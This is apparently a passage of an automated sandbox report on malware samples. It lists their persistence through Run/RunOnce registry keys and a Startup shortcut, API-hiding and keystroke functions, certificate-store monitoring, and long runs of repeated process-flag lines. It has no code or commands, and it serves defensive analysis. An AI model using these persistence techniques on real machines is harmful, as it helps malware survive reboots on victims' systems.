File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_006359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		19_2_006359B3
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		19_2_005C5EDA

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005D33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_005D33B7

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
